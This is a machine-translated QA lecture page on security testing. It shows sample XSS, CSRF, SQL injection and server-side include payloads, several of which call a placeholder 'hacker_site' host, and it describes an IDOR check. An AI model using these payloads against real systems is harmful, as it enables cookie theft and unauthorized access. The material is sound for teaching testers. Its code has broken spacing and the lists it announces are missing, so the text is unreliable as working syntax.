Lecture
Security testing is a testing strategy used to test the security of a system, as well as to analyze the risks associated with providing a holistic approach to protecting an application, hacker attacks, viruses, and unauthorized access to confidential data.
The overall security strategy is based on three main principles:
Confidentiality is the concealment of certain resources or information. By confidentiality you can understand the restriction of access to a resource for a certain category of users, or in other words, under what conditions a user is authorized to access this resource.
There are two main criteria when defining the concept of integrity:
Accessibility is a requirement that resources must be available to an authorized user, internal object, or device. As a rule, the more critical a resource is, the higher the level of availability should be.
Currently, the most common types of software security vulnerabilities are:
We give examples of software testing for vulnerabilities in the security system. To do this, you need to check your software for known types of vulnerabilities:
XSS attacks themselves can be very diverse. Attackers can try to steal your cookies, redirect you to a site where a more serious attack will occur, load a malicious object into memory, etc., just by placing a malicious script on your site. As an example, consider the following script that displays your cookies:
<script> alert (document.cookie); </ script>
or a script that redirects to the infected page:
<script> window.parent.location.href = 'http: // hacker_site'; </ script>
or creating a malicious object with a virus, etc .:
<object type = "text / x-scriptlet" data = "http: // hacker_site"> </ object>
To view more examples, we recommend visiting the page: XSS (Cross Site Scripting) ...
The most frequent CSRF attacks are attacks using the HTML <IMG> tag or Javascript image object. Most often, an attacker adds the necessary code to an email or puts it on a website, so that when the page loads, a request is executed that executes the malicious code. Examples:
IMG SRC
<img src = "http: // hacker_site /? command">
SCRIPT SRC
<script src = "http: // hacker_site /? command">
Javascript image object
<script> var foo = new Image (); foo.src = "http: // hacker_site /? command"; </ script>
We will consider insertions of the executed code on the example of the SQL code.
The login form has 2 fields - name and password. Processing takes place in the database through the execution of an SQL query:
SELECT Username FROM Users WHERE Name = 'tester' AND Password = 'testpass';
Enter the correct name 'tester', and in the password field enter the line:
testpass 'OR' 1 '=' 1
As a result, if the field does not have the appropriate validations or data handlers, a vulnerability may appear that allows you to log into the password-protected system, since the SQL request will look like this:
SELECT Username FROM Users WHERE Name = 'tester' AND Password = 'testpass' OR '1' = '1';
The condition '1' = '1' will always be true and therefore the SQL query will always return many values.
Depending on the type of operating system, the commands may be different, as an example, consider the com *** y, which displays a list of files in the Linux OS:
<! - # exec cmd = "ls" ->
User A can access user B.'s documents. Suppose there is an implementation where, when viewing his profile containing confidential information, the userID is passed to the page URL, but in this case it makes sense to try to substitute the userID number of another user. And if you see his data, it means you have found a defect.
There are a huge number of examples of vulnerabilities and attacks. Even after conducting a full cycle of security testing, you cannot be 100% sure that the system is truly secure. But you can be sure that the percentage of unauthorized penetrations, theft of information and data loss will be several times less than those who did not conduct security testing.
Comments
To leave a comment
Quality Assurance
Terms: Quality Assurance